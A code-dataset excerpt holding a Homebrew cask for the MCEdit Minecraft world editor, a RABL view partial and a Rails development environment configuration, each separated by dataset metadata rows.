  end
end
| 22.490196 | 86 | 0.577158 |
5dd7a7cad02df61f1ce0701ef241bfaccd41166e | 468 | cask "mcedit" do
version "1.5.6.0"
sha256 "e2026de3589e3e65086a385ee4e02d607337bc9da11357d1b3ac106e2ee843d7"
url "https://github.com/Podshot/MCEdit-Unified/releases/download/#{version}/MCEdit.v#{version}.OSX.64bit.zip",
verified: "github.com/Podshot/MCEdit-Unified/"
name "MCEdit-Unified"
desc "Minecraft world editor"
homepage "https://www.mcedit-unified.net/"
livecheck do
url :url
strategy :github_latest
end
app "mcedit.app"
end
| 26 | 112 | 0.735043 |
21f8389cc38ef9e8b8394d1a582ab2a09e5edc0b | 154 | attribute :anonymous
# Mix in shared attribute definitions from other RABL partials.
extends "api/v1/shopping_cart/partials/items/base"
extends "api/v1/bounties/partials/owner"
extends "api/v1/bounties/partials/issue" | 30.8 | 50 | 0.818182 |
bf8b8ea6c1efcaf48e1dcbd22cb6f1e177e5b871 | 1,974 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.action_mailer.default_url_options = {host: "localhost", port: 3000}
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join("tmp/caching-dev.txt").exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
"Cache-Control" => "public, max-age=#{2.days.seconds.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 35.890909 | 85 | 0.762411 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.